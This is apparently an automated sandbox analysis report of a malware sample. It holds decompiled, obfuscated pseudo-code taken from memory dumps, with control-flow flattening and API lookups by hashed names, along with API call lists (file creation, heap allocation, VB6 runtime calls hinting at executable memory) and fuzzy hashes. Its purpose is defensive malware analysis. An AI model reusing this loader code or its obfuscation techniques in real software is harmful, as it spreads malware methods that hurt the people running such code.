                                                        									 *0x3fe484 = _t23;
                                                        								}
                                                        								 *_t23(_v24, 1, _t112, 0x2000,  &_v4);
                                                        								asm("sbb esi, esi");
                                                        								_t26 =  *0x3fe18c;
                                                        								_t104 = (_t104 & 0x0b23632b) + 0x5d498c4;
                                                        								__eflags = _t26;
                                                        								if(_t26 == 0) {
                                                        									_t26 = E003F3E60(_t58, E003F3F00(0x26f5757c), 0x268fe5f0, _t112);
                                                        									 *0x3fe18c = _t26;
                                                        								}
                                                        								_t16 =  *_t26(_v44);
                                                        								goto L40;
                                                        							} else {
                                                        								__eflags = _t104 - 0x1ca940c1;
                                                        								if(_t104 == 0x1ca940c1) {
                                                        									_t104 = 0x2fab56c4;
                                                        									continue;
                                                        								} else {
                                                        									__eflags = _t104 - 0x254bd927;
                                                        									if(_t104 != 0x254bd927) {
                                                        										L40:
                                                        										__eflags = _t104 - 0x1f0f293e;
                                                        										if(_t104 != 0x1f0f293e) {
                                                        											while(1) {
                                                        												_t16 = _v28;
                                                        												goto L2;
                                                        											}
                                                        										}
                                                        									} else {
                                                        										_t50 =  *0x3fe29c;
                                                        										__eflags = _t50;
                                                        										if(_t50 == 0) {
                                                        											_t50 = E003F3E60(_t58, E003F3F00(0x26f5757c), 0x4574c66, _t112);
                                                        											 *0x3fe29c = _t50;
                                                        										}
                                                        										_t51 =  *_t50(_v20, 0, 0x30, 3, _t58, 0x20000,  &_v8,  &_v12, 0, 0);
                                                        										__eflags = _t51;
                                                        										if(_t51 == 0) {
                                                        											L13:
                                                        											_t104 = 0x11e09e52;
                                                        											while(1) {
                                                        												_t16 = _v28;
                                                        												goto L2;
                                                        											}
                                                        										} else {
                                                        											_t52 =  *0x3fde08;
                                                        											__eflags = _t52;
                                                        											if(_t52 == 0) {
                                                        												_t52 = E003F3E60(_t58, E003F3F00(0x9bab0b12), 0xd8ef4c49, _t112);
                                                        												 *0x3fde08 = _t52;
                                                        											}
                                                        											_t53 =  *_t52();
                                                        											_t104 = 0x128dff18;
                                                        											_t103 = _t58 + (_t53 & 0x0000001f) * 0x2c;
                                                        											_t16 = _t58 + _v52 * 0x2c;
                                                        											__eflags = _t103 - _t16;
                                                        											_v68 = _t16;
                                                        											_t101 =  >=  ? _t58 : _t103;
                                                        											continue;
                                                        										}
                                                        										L55:
                                                        									}
                                                        								}
                                                        							}
                                                        						}
                                                        						L54:
                                                        						return _t16;
                                                        						goto L55;
                                                        					}
                                                        					if(_t115 == 0) {
                                                        						_t29 =  *0x3fe494;
                                                        						__eflags = _t29;
                                                        						if(_t29 == 0) {
                                                        							_t29 = E003F3E60(_t58, E003F3F00(0x9bab0b12), 0x7facde30, _t112);
                                                        							 *0x3fe494 = _t29;
                                                        						}
                                                        						_t107 =  *_t29();
                                                        						_t31 =  *0x3fdf30;
                                                        						__eflags = _t31;
                                                        						if(_t31 == 0) {
                                                        							_t31 = E003F3E60(_t58, E003F3F00(0x9bab0b12), 0x5010a54d, _t112);
                                                        							 *0x3fdf30 = _t31;
                                                        						}
                                                        						return  *_t31(_t107, 0, _t58);
                                                        					}
                                                        					_t116 = _t104 - 0x10f7fbef;
                                                        					if(_t116 > 0) {
                                                        						__eflags = _t104 - 0x11e09e52;
                                                        						if(_t104 == 0x11e09e52) {
                                                        							_t35 =  *0x3fe494;
                                                        							__eflags = _t35;
                                                        							if(_t35 == 0) {
                                                        								_t35 = E003F3E60(_t58, E003F3F00(0x9bab0b12), 0x7facde30, _t112);
                                                        								 *0x3fe494 = _t35;
                                                        							}
                                                        							_t108 =  *_t35();
                                                        							_t37 =  *0x3fdf30;
                                                        							__eflags = _t37;
                                                        							if(_t37 == 0) {
                                                        								_t37 = E003F3E60(_t58, E003F3F00(0x9bab0b12), 0x5010a54d, _t112);
                                                        								 *0x3fdf30 = _t37;
                                                        							}
                                                        							 *_t37(_t108, 0, _t112);
                                                        							_t104 = 0x12f72f95;
                                                        							continue;
                                                        						} else {
                                                        							__eflags = _t104 - 0x128dff18;
                                                        							if(_t104 != 0x128dff18) {
                                                        								goto L40;
                                                        							} else {
                                                        								_t41 =  *0x3fe270;
                                                        								__eflags = _t41;
                                                        								if(_t41 == 0) {
                                                        									_t41 = E003F3E60(_t58, E003F3F00(0x26f5757c), 0x56e230f9, _t112);
                                                        									 *0x3fe270 = _t41;
                                                        								}
                                                        								_t42 =  *_t41(_v20,  *_t101, 1);
                                                        								__eflags = _t42;
                                                        								_v36 = _t42;
                                                        								_t104 =  !=  ? 0x26342ffd : 0x5d498c4;
                                                        								while(1) {
                                                        									_t16 = _v28;
                                                        									goto L2;
                                                        								}
                                                        							}
                                                        						}
                                                        					} else {
                                                        						if(_t116 == 0) {
                                                        							_t45 =  *0x3fe200;
                                                        							__eflags = _t45;
                                                        							if(_t45 == 0) {
                                                        								_t45 = E003F3E60(_t58, E003F3F00(0x26f5757c), 0x16d40839, _t112);
                                                        								 *0x3fe200 = _t45;
                                                        							}
                                                        							 *_t45(_v16, 1, _t112);
                                                        							goto L13;
                                                        						} else {
                                                        							if(_t104 == 0x5d498c4) {
                                                        								_t101 = _t101 + 0x2c;
                                                        								__eflags = _t101 - _t16;
                                                        								asm("sbb esi, esi");
                                                        								_t104 = (_t104 & 0x00ad60c6) + 0x11e09e52;
                                                        								goto L2;
                                                        							} else {
                                                        								if(_t104 != 0x8956eec) {
                                                        									goto L40;
                                                        								} else {
                                                        									_t112 = E003F42C0(_t58, 0x2000);
                                                        									_t104 =  !=  ? 0x254bd927 : 0x12f72f95;
                                                        									while(1) {
                                                        										_t16 = _v28;
                                                        										goto L2;
                                                        									}
                                                        								}
                                                        							}
                                                        						}
                                                        					}
                                                        					goto L54;
                                                        				}
                                                        			}









































                                                        0x003f5047
                                                        0x003f504b
                                                        0x003f504d
                                                        0x003f5051
                                                        0x003f5053
                                                        0x003f5057
                                                        0x003f505c
                                                        0x003f505c
                                                        0x003f5060
                                                        0x003f5060
                                                        0x003f5060
                                                        0x003f5066
                                                        0x00000000
                                                        0x00000000
                                                        0x003f51af
                                                        0x003f51b5
                                                        0x003f52f9
                                                        0x003f52ff
                                                        0x00000000
                                                        0x003f5301
                                                        0x003f5301
                                                        0x003f5306
                                                        0x003f5308
                                                        0x003f531b
                                                        0x003f5320
                                                        0x003f5320
                                                        0x003f5327
                                                        0x003f532e
                                                        0x003f5330
                                                        0x003f5348
                                                        0x003f5348
                                                        0x003f5355
                                                        0x003f5357
                                                        0x003f5359
                                                        0x003f535b
                                                        0x003f535d
                                                        0x003f505c
                                                        0x003f505c
                                                        0x00000000
                                                        0x003f505c
                                                        0x003f505c
                                                        0x003f535b
                                                        0x003f51bb
                                                        0x003f51bb
                                                        0x003f5277
                                                        0x003f527c
                                                        0x003f527e
                                                        0x003f5291
                                                        0x003f5296
                                                        0x003f5296
                                                        0x003f52ac
                                                        0x003f52b0
                                                        0x003f52b2
                                                        0x003f52bd
                                                        0x003f52c3
                                                        0x003f52c5
                                                        0x003f52d8
                                                        0x003f52dd
                                                        0x003f52dd
                                                        0x003f52e6
                                                        0x00000000
                                                        0x003f51c1
                                                        0x003f51c1
                                                        0x003f51c7
                                                        0x003f526d
                                                        0x00000000
                                                        0x003f51cd
                                                        0x003f51cd
                                                        0x003f51d3
                                                        0x003f52e8
                                                        0x003f52e8
                                                        0x003f52ee
                                                        0x003f505c
                                                        0x003f505c
                                                        0x00000000
                                                        0x003f505c
                                                        0x003f505c
                                                        0x003f51d9
                                                        0x003f51d9
                                                        0x003f51de
                                                        0x003f51e0
                                                        0x003f51f3
                                                        0x003f51f8
                                                        0x003f51f8
                                                        0x003f521b
                                                        0x003f521d
                                                        0x003f521f
                                                        0x003f50ef
                                                        0x003f50ef
                                                        0x003f505c
                                                        0x003f505c
                                                        0x00000000
                                                        0x003f505c
                                                        0x003f5225
                                                        0x003f5225
                                                        0x003f522a
                                                        0x003f522c
                                                        0x003f523f
                                                        0x003f5244
                                                        0x003f5244
                                                        0x003f5249
                                                        0x003f524e
                                                        0x003f525b
                                                        0x003f525d
                                                        0x003f525f
                                                        0x003f5261
                                                        0x003f5265
                                                        0x00000000
                                                        0x003f5265
                                                        0x00000000
                                                        0x003f521f
                                                        0x003f51d3
                                                        0x003f51c7
                                                        0x003f51bb
                                                        0x003f53c0
                                                        0x003f53c0
                                                        0x00000000
                                                        0x003f53c0
                                                        0x003f506c
                                                        0x003f5367
                                                        0x003f536c
                                                        0x003f536e
                                                        0x003f5381
                                                        0x003f5386
                                                        0x003f5386
                                                        0x003f538d
                                                        0x003f538f
                                                        0x003f5394
                                                        0x003f5396
                                                        0x003f53a9
                                                        0x003f53ae
                                                        0x003f53ae
                                                        0x00000000
                                                        0x003f53b7
                                                        0x003f5072
                                                        0x003f5078
                                                        0x003f50f9
                                                        0x003f50ff
                                                        0x003f5153
                                                        0x003f5158
                                                        0x003f515a
                                                        0x003f516d
                                                        0x003f5172
                                                        0x003f5172
                                                        0x003f5179
                                                        0x003f517b
                                                        0x003f5180
                                                        0x003f5182
                                                        0x003f5195
                                                        0x003f519a
                                                        0x003f519a
                                                        0x003f51a3
                                                        0x003f51a5
                                                        0x00000000
                                                        0x003f5101
                                                        0x003f5101
                                                        0x003f5107
                                                        0x00000000
                                                        0x003f510d
                                                        0x003f510d
                                                        0x003f5112
                                                        0x003f5114
                                                        0x003f5127
                                                        0x003f512c
                                                        0x003f512c
                                                        0x003f5139
                                                        0x003f513b
                                                        0x003f513d
                                                        0x003f514b
                                                        0x003f505c
                                                        0x003f505c
                                                        0x00000000
                                                        0x003f505c
                                                        0x003f505c
                                                        0x003f5107
                                                        0x003f507a
                                                        0x003f507a
                                                        0x003f50c2
                                                        0x003f50c7
                                                        0x003f50c9
                                                        0x003f50dc
                                                        0x003f50e1
                                                        0x003f50e1
                                                        0x003f50ed
                                                        0x00000000
                                                        0x003f507c
                                                        0x003f5082
                                                        0x003f50ad
                                                        0x003f50b0
                                                        0x003f50b2
                                                        0x003f50ba
                                                        0x00000000
                                                        0x003f5084
                                                        0x003f508a
                                                        0x00000000
                                                        0x003f5090
                                                        0x003f509a
                                                        0x003f50a8
                                                        0x003f505c
                                                        0x003f505c
                                                        0x00000000
                                                        0x003f505c
                                                        0x003f505c
                                                        0x003f508a
                                                        0x003f5082
                                                        0x003f507a
                                                        0x00000000
                                                        0x003f5078

                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(00000000,00000008,00020000,?,?,003F8AC8,?,3251FEFE,?,?), ref: 003F5355
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256698017.00000000003F1000.00000020.00000001.sdmp, Offset: 003F0000, based on PE: true
                                                        • Associated: 00000007.00000002.2256695140.00000000003F0000.00000004.00000001.sdmp Download File
                                                        • Associated: 00000007.00000002.2256705457.00000000003FD000.00000004.00000001.sdmp Download File
                                                        • Associated: 00000007.00000002.2256709121.00000000003FF000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_3f0000_tmp_e473b4.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID:
                                                        • API String ID: 1279760036-0
                                                        • Opcode ID: 7f529263dafc6a9211e23db47f87235f5a0e852e3501bf7e7d808465ba6d5ef4
                                                        • Instruction ID: 80202b7f37280395a77b43978ba4fcd5861651b3dcc3744a12da59624b2bbbca
                                                        • Opcode Fuzzy Hash: 7f529263dafc6a9211e23db47f87235f5a0e852e3501bf7e7d808465ba6d5ef4
                                                        • Instruction Fuzzy Hash: 30811532B447195BDB12AF7D9C9573E36EEABA4744F020529FB01DF2A5EA20DD0087C2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 66%
                                                        			E003F80A0(signed int __edx) {
                                                        				short _v524;
                                                        				struct _SECURITY_ATTRIBUTES* _v532;
                                                        				intOrPtr _v536;
                                                        				intOrPtr _v540;
                                                        				intOrPtr _v544;
                                                        				intOrPtr _v548;
                                                        				intOrPtr _v552;
                                                        				intOrPtr _v556;
                                                        				intOrPtr _v560;
                                                        				char _v564;
                                                        				intOrPtr _v568;
                                                        				char _v572;
                                                        				struct _SECURITY_ATTRIBUTES* _v576;
                                                        				intOrPtr _v580;
                                                        				signed int _v584;
                                                        				signed int _v588;
                                                        				signed int _v592;
                                                        				signed int _v596;
                                                        				void* __ebx;
                                                        				void* __ebp;
                                                        				void* _t58;
                                                        				void* _t64;
                                                        				void* _t66;
                                                        				intOrPtr* _t68;
                                                        				void* _t72;
                                                        				intOrPtr* _t77;
                                                        				intOrPtr* _t79;
                                                        				void* _t81;
                                                        				void* _t82;
                                                        				intOrPtr* _t85;
                                                        				void* _t87;
                                                        				intOrPtr _t88;
                                                        				intOrPtr* _t89;
                                                        				void* _t91;
                                                        				void* _t95;
                                                        				intOrPtr _t100;
                                                        				char _t104;
                                                        				signed int _t121;
                                                        				void* _t124;
                                                        				void* _t126;
                                                        				void* _t127;
                                                        				signed int* _t128;
                                                        				void* _t130;
                                                        
                                                        				_t121 = __edx;
                                                        				_t128 =  &_v596;
                                                        				_v584 = 0x9318;
                                                        				_t58 = 0x343bfd89;
                                                        				_v584 = _v584 ^ 0xde90c338;
                                                        				_v584 = _v584 ^ 0xde905120;
                                                        				_v596 = 0x7d19;
                                                        				_v596 = _v596 << 9;
                                                        				_v596 = _v596 >> 0xe;
                                                        				_v596 = _v596 + 0xffff07e5;
                                                        				_v596 = _v596 | 0x8aea6eef;
                                                        				_v596 = _v596 + 0xd867;
                                                        				_v596 = _v596 + 0x9c41;
                                                        				_v596 = _v596 + 0x3de0;
                                                        				_v596 = _v596 + 0x218b;
                                                        				_v596 = _v596 ^ 0x00014403;
                                                        				_v592 = 0x2591;
                                                        				_t127 = _v584;
                                                        				_t95 = 0;
                                                        				_v592 = _v592 * 0x7d;
                                                        				_v592 = _v592 + 0x8d68;
                                                        				_v592 = _v592 + 0xffff8911;
                                                        				_v592 = _v592 * 0x6a;
                                                        				_v592 = _v592 + 0xffff93d5;
                                                        				_v592 = _v592 ^ 0x07a13cd2;
                                                        				_v588 = 0x789;
                                                        				_v588 = _v588 >> 1;
                                                        				_v588 = _v588 ^ 0xaee58af2;
                                                        				_v588 = _v588 ^ 0xaee58936;
                                                        				while(1) {
                                                        					L1:
                                                        					goto L2;
                                                        					do {
                                                        						while(1) {
                                                        							L2:
                                                        							_t130 = _t58 - 0xea5411f;
                                                        							if(_t130 > 0) {
                                                        								break;
                                                        							}
                                                        							if(_t130 == 0) {
                                                        								_t72 = E003F34C0(0x3fd970);
                                                        								_t121 =  *0x3fe158;
                                                        								_t126 = _t72;
                                                        								if(_t121 == 0) {
                                                        									_t121 = E003F3E60(_t95, E003F3F00(0xc6fbcd74), 0xba71dd03, _t127);
                                                        									 *0x3fe158 = _t121;
                                                        								}
                                                        								_t100 =  *0x3fe54c; // 0x55f0b0
                                                        								_t50 = _t100 + 0x260; // 0x55f310
                                                        								_t51 = _t100 + 0x18; // 0x55f0c8
                                                        								 *_t121( &_v524, 0x104, _t126, _t51, _t50);
                                                        								_t77 =  *0x3fe494;
                                                        								_t128 =  &(_t128[5]);
                                                        								if(_t77 == 0) {
                                                        									_t82 = E003F3F00(0x9bab0b12);
                                                        									_t121 = 0x7facde30;
                                                        									_t77 = E003F3E60(_t95, _t82, 0x7facde30, _t127);
                                                        									 *0x3fe494 = _t77;
                                                        								}
                                                        								_t124 =  *_t77();
                                                        								_t79 =  *0x3fdf30;
                                                        								if(_t79 == 0) {
                                                        									_t81 = E003F3F00(0x9bab0b12);
                                                        									_t121 = 0x5010a54d;
                                                        									_t79 = E003F3E60(_t95, _t81, 0x5010a54d, _t127);
                                                        									 *0x3fdf30 = _t79;
                                                        								}
                                                        								 *_t79(_t124, 0, _t126);
                                                        								_t58 = 0x2c2d24c8;
                                                        								goto L1;
                                                        							} else {
                                                        								if(_t58 == 0x2f64d8b) {
                                                        									_t85 =  *0x3fe1d4;
                                                        									if(_t85 == 0) {
                                                        										_t87 = E003F3F00(0x9bab0b12);
                                                        										_t121 = 0xa229df38;
                                                        										_t85 = E003F3E60(_t95, _t87, 0xa229df38, _t127);
                                                        										 *0x3fe1d4 = _t85;
                                                        									}
                                                        									 *_t85( &_v572);
                                                        									_t58 = 0xc5e088d;
                                                        									continue;
                                                        								} else {
                                                        									if(_t58 == 0x6f65414) {
                                                        										_t88 = _v568;
                                                        										_t104 = _v572;
                                                        										_v560 = _t88;
                                                        										_v552 = _t88;
                                                        										_v544 = _t88;
                                                        										_v536 = _t88;
                                                        										_t89 =  *0x3fdee4;
                                                        										_v564 = _t104;
                                                        										_v556 = _t104;
                                                        										_v548 = _t104;
                                                        										_v540 = _t104;
                                                        										_v532 = 0;
                                                        										if(_t89 == 0) {
                                                        											_t91 = E003F3F00(0x9bab0b12);
                                                        											_t121 = 0x4bf45878;
                                                        											_t89 = E003F3E60(_t95, _t91, 0x4bf45878, _t127);
                                                        											 *0x3fdee4 = _t89;
                                                        										}
                                                        										 *_t89(_t127, 0,  &_v564, 0x28);
                                                        										_t58 = 0x3557bd8c;
                                                        										_t95 =  !=  ? 1 : _t95;
                                                        										continue;
                                                        									} else {
                                                        										if(_t58 != 0xc5e088d) {
                                                        											goto L24;
                                                        										} else {
                                                        											_v580 = 0xa8c00;
                                                        											_v576 = 0;
                                                        											_v596 = E003FB6E0(_v580, _v576, 0x989680, 0);
                                                        											_v592 = _t121;
                                                        											_v588 = _v588 - _v596;
                                                        											_t58 = 0xea5411f;
                                                        											asm("sbb [esp+0x2c], ecx");
                                                        											continue;
                                                        										}
                                                        									}
                                                        								}
                                                        							}
                                                        							L35:
                                                        						}
                                                        						if(_t58 == 0x2c2d24c8) {
                                                        							if( *0x3fde04 == 0) {
                                                        								_t66 = E003F3F00(0x9bab0b12);
                                                        								_t121 = 0xb66d748a;
                                                        								 *0x3fde04 = E003F3E60(_t95, _t66, 0xb66d748a, _t127);
                                                        							}
                                                        							_t64 = CreateFileW( &_v524, _v584, _v596, 0, _v592, _v588, 0); // executed
                                                        							_t127 = _t64;
                                                        							if(_t127 == 0xffffffff) {
                                                        								goto L34;
                                                        							} else {
                                                        								_t58 = 0x6f65414;
                                                        								goto L2;
                                                        							}
                                                        						} else {
                                                        							if(_t58 == 0x343bfd89) {
                                                        								_t58 = 0x2f64d8b;
                                                        								goto L2;
                                                        							} else {
                                                        								if(_t58 == 0x3557bd8c) {
                                                        									_t68 =  *0x3fde3c;
                                                        									if(_t68 == 0) {
                                                        										_t68 = E003F3E60(_t95, E003F3F00(0x9bab0b12), 0x20de7595, _t127);
                                                        										 *0x3fde3c = _t68;
                                                        									}
                                                        									 *_t68(_t127);
                                                        									L34:
                                                        									return _t95;
                                                        								} else {
                                                        									goto L24;
                                                        								}
                                                        							}
                                                        						}
                                                        						goto L35;
                                                        						L24:
                                                        					} while (_t58 != 0xcfe8e);
                                                        					return _t95;
                                                        					goto L35;
                                                        				}
                                                        			}














































                                                        0x003f80a0
                                                        0x003f80a0
                                                        0x003f80a6
                                                        0x003f80ae
                                                        0x003f80b3
                                                        0x003f80bb
                                                        0x003f80c3
                                                        0x003f80ca
                                                        0x003f80ce
                                                        0x003f80d2
                                                        0x003f80d9
                                                        0x003f80e0
                                                        0x003f80e7
                                                        0x003f80ee
                                                        0x003f80f5
                                                        0x003f80fc
                                                        0x003f8103
                                                        0x003f8112
                                                        0x003f8116
                                                        0x003f8119
                                                        0x003f811d
                                                        0x003f8125
                                                        0x003f8133
                                                        0x003f8137
                                                        0x003f813f
                                                        0x003f8147
                                                        0x003f814f
                                                        0x003f8153
                                                        0x003f815b
                                                        0x003f8163
                                                        0x003f8163
                                                        0x003f8168
                                                        0x003f8170
                                                        0x003f8170
                                                        0x003f8170
                                                        0x003f8170
                                                        0x003f8175
                                                        0x00000000
                                                        0x00000000
                                                        0x003f817b
                                                        0x003f828c
                                                        0x003f8291
                                                        0x003f8297
                                                        0x003f829b
                                                        0x003f82b3
                                                        0x003f82b5
                                                        0x003f82b5
                                                        0x003f82bb
                                                        0x003f82c1
                                                        0x003f82c8
                                                        0x003f82d7
                                                        0x003f82d9
                                                        0x003f82de
                                                        0x003f82e3
                                                        0x003f82ea
                                                        0x003f82ef
                                                        0x003f82f6
                                                        0x003f82fb
                                                        0x003f82fb
                                                        0x003f8302
                                                        0x003f8304
                                                        0x003f830b
                                                        0x003f8312
                                                        0x003f8317
                                                        0x003f831e
                                                        0x003f8323
                                                        0x003f8323
                                                        0x003f832c
                                                        0x003f832e
                                                        0x00000000
                                                        0x003f8181
                                                        0x003f8186
                                                        0x003f8252
                                                        0x003f8259
                                                        0x003f8260
                                                        0x003f8265
                                                        0x003f826c
                                                        0x003f8271
                                                        0x003f8271
                                                        0x003f827b
                                                        0x003f827d
                                                        0x00000000
                                                        0x003f818c
                                                        0x003f8191
                                                        0x003f81e3
                                                        0x003f81e7
                                                        0x003f81eb
                                                        0x003f81ef
                                                        0x003f81f3
                                                        0x003f81f7
                                                        0x003f81fb
                                                        0x003f8200
                                                        0x003f8204
                                                        0x003f8208
                                                        0x003f820c
                                                        0x003f8210
                                                        0x003f821a
                                                        0x003f8221
                                                        0x003f8226
                                                        0x003f822d
                                                        0x003f8232
                                                        0x003f8232
                                                        0x003f8241
                                                        0x003f8245
                                                        0x003f824a
                                                        0x00000000
                                                        0x003f8193
                                                        0x003f8198
                                                        0x00000000
                                                        0x003f819e
                                                        0x003f81a0
                                                        0x003f81a8
                                                        0x003f81c4
                                                        0x003f81c8
                                                        0x003f81d4
                                                        0x003f81d8
                                                        0x003f81dd
                                                        0x00000000
                                                        0x003f81dd
                                                        0x003f8198
                                                        0x003f8191
                                                        0x003f8186
                                                        0x00000000
                                                        0x003f817b
                                                        0x003f833d
                                                        0x003f8377
                                                        0x003f837e
                                                        0x003f8383
                                                        0x003f8391
                                                        0x003f8391
                                                        0x003f83b4
                                                        0x003f83b6
                                                        0x003f83bb
                                                        0x00000000
                                                        0x003f83bd
                                                        0x003f83bd
                                                        0x00000000
                                                        0x003f83bd
                                                        0x003f833f
                                                        0x003f8344
                                                        0x003f8365
                                                        0x00000000
                                                        0x003f8346
                                                        0x003f834b
                                                        0x003f83c7
                                                        0x003f83ce
                                                        0x003f83e1
                                                        0x003f83e6
                                                        0x003f83e6
                                                        0x003f83ec
                                                        0x003f83f1
                                                        0x003f83fa
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x003f834b
                                                        0x003f8344
                                                        0x00000000
                                                        0x003f834d
                                                        0x003f834d
                                                        0x003f8364
                                                        0x00000000
                                                        0x003f8364

                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,?,?,00000000,?,?,00000000,?,3251FEFE,?,?), ref: 003F83B4
                                                        Memory Dump Source
                                                        • Source File: 00000007.00000002.2256698017.00000000003F1000.00000020.00000001.sdmp, Offset: 003F0000, based on PE: true
                                                        • Associated: 00000007.00000002.2256695140.00000000003F0000.00000004.00000001.sdmp Download File
                                                        • Associated: 00000007.00000002.2256705457.00000000003FD000.00000004.00000001.sdmp Download File
                                                        • Associated: 00000007.00000002.2256709121.00000000003FF000.00000002.00000001.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_7_2_3f0000_tmp_e473b4.jbxd
                                                        Yara matches
                                                        Similarity
                                                        • API ID: CreateFile
                                                        • String ID:
                                                        • API String ID: 823142352-0
                                                        • Opcode ID: ba49c88e37c258a480666faf3766a118a2188a43ef95d818bed8b1fa3f2cbf86
                                                        • Instruction ID: 5a47b5096b30a79b2d4a356f4713c20b600fb5e14bae330f2b9d4b79e0fd2fd5
                                                        • Opcode Fuzzy Hash: ba49c88e37c258a480666faf3766a118a2188a43ef95d818bed8b1fa3f2cbf86
                                                        • Instruction Fuzzy Hash: 4E819E756083099FDB1ADF69C84463FB7E9AB94748F00092EF685CB2A0EB74DD05CB52
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 0041981D
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00410748,0000001C), ref: 0041987E
                                                        • __vbaI4Var.MSVBVM60(?), ref: 00419890
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00410414,00000054), ref: 004198B2
                                                        • __vbaFreeObj.MSVBVM60 ref: 004198BB
                                                        • __vbaFreeVar.MSVBVM60 ref: 004198C4
                                                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 004198D8
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00410748,0000001C), ref: 00419924
                                                        • __vbaI4Var.MSVBVM60(?), ref: 00419936
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00410414,0000006C), ref: 00419962
                                                        • __vbaFreeObj.MSVBVM60 ref: 0041996B
                                                        • __vbaFreeVar.MSVBVM60 ref: 00419974
                                                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 00419988
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00410748,0000001C), ref: 004199D4
                                                        • __vbaI4Var.MSVBVM60(?), ref: 004199E6
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00410414,00000054), ref: 00419A12
                                                        • __vbaFreeObj.MSVBVM60 ref: 00419A1B
                                                        • __vbaFreeVar.MSVBVM60 ref: 00419A24
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00410748,0000001C), ref: 00419A66
                                                        • __vbaBoolVar.MSVBVM60(?), ref: 00419A75
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00080005,0040F430,00000094), ref: 00419AA1
                                                        • __vbaFreeVar.MSVBVM60 ref: 00419AAE
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,00401610,0040F430,000002B0), ref: 00419AE9
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00410678,00000024), ref: 00419B13
                                                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 00419B23
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,72A1A274,00410748,0000001C), ref: 00419B7D
                                                        • __vbaCastObjVar.MSVBVM60(?,00410280), ref: 00419B94
                                                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 00419B9F
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00410414,00000214), ref: 00419BC7
                                                        • __vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 00419BDB
                                                        • __vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 00419BEB
                                                        • __vbaObjSet.MSVBVM60(?,00000000), ref: 00419C02
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00410748,0000001C), ref: 00419C4E
                                                        • __vbaStrVarVal.MSVBVM60(?,?), ref: 00419C64
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00410414,0000023C), ref: 00419C8C
                                                        • __vbaFreeStr.MSVBVM60 ref: 00419C95
                                                        • __vbaFreeObj.MSVBVM60 ref: 00419C9E
                                                        • __vbaFreeVar.MSVBVM60 ref: 00419CA7
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00410748,0000001C), ref: 00419D08
                                                        • __vbaI2Var.MSVBVM60(?), ref: 00419D12
                                                        • __vbaFreeVar.MSVBVM60 ref: 00419D1F
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00410748,0000001C), ref: 00419D6F
                                                        • __vbaI2Var.MSVBVM60(?), ref: 00419D79
                                                        • __vbaFreeVar.MSVBVM60 ref: 00419D86
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00410748,0000001C), ref: 00419DD8
                                                        • __vbaI2Var.MSVBVM60(?), ref: 00419DE2
                                                        • __vbaFreeVar.MSVBVM60 ref: 00419DEF
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00410748,0000001C), ref: 00419E41
                                                        • __vbaI2Var.MSVBVM60(?), ref: 00419E4B
                                                        • __vbaFreeVar.MSVBVM60 ref: 00419E58
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00410748,0000001C), ref: 00419EAA
                                                        • __vbaI2Var.MSVBVM60(?), ref: 00419EB4
                                                        • __vbaFreeVar.MSVBVM60 ref: 00419EC1
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00410748,0000001C), ref: 00419F13
                                                        • __vbaBoolVar.MSVBVM60(?), ref: 00419F1D
                                                        • __vbaFreeVar.MSVBVM60 ref: 00419F2A
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00410748,0000001C), ref: 00419F7C
                                                        • __vbaBoolVar.MSVBVM60(?), ref: 00419F86
                                                        • __vbaFreeVar.MSVBVM60 ref: 00419F93
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00410748,0000001C), ref: 00419FE5
                                                        • __vbaI2Var.MSVBVM60(?), ref: 00419FEF
                                                        • __vbaFreeVar.MSVBVM60 ref: 00419FFC
                                                        • __vbaI4Str.MSVBVM60(&H40), ref: 0041A007
                                                        • __vbaI4Str.MSVBVM60(&H1000,00000000), ref: 0041A013
                                                        • __vbaSetSystemError.MSVBVM60(00000000,00001190,00000000), ref: 0041A02D
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00410748,0000001C), ref: 0041A08B
                                                        • __vbaBoolVar.MSVBVM60(?), ref: 0041A095
                                                        • __vbaFreeVar.MSVBVM60 ref: 0041A0A2
                                                        • __vbaHresultCheckObj.MSVBVM60(00000000,?,00410748,0000001C), ref: 0041A0F4
                                                        • __vbaI2Var.MSVBVM60(?), ref: 0041A0FE
                                                        • __vbaFreeVar.MSVBVM60 ref: 0041A10B
                                                        • __vbaSetSystemError.MSVBVM60(003E0000,00000000,00001190,?), ref: 0041A142
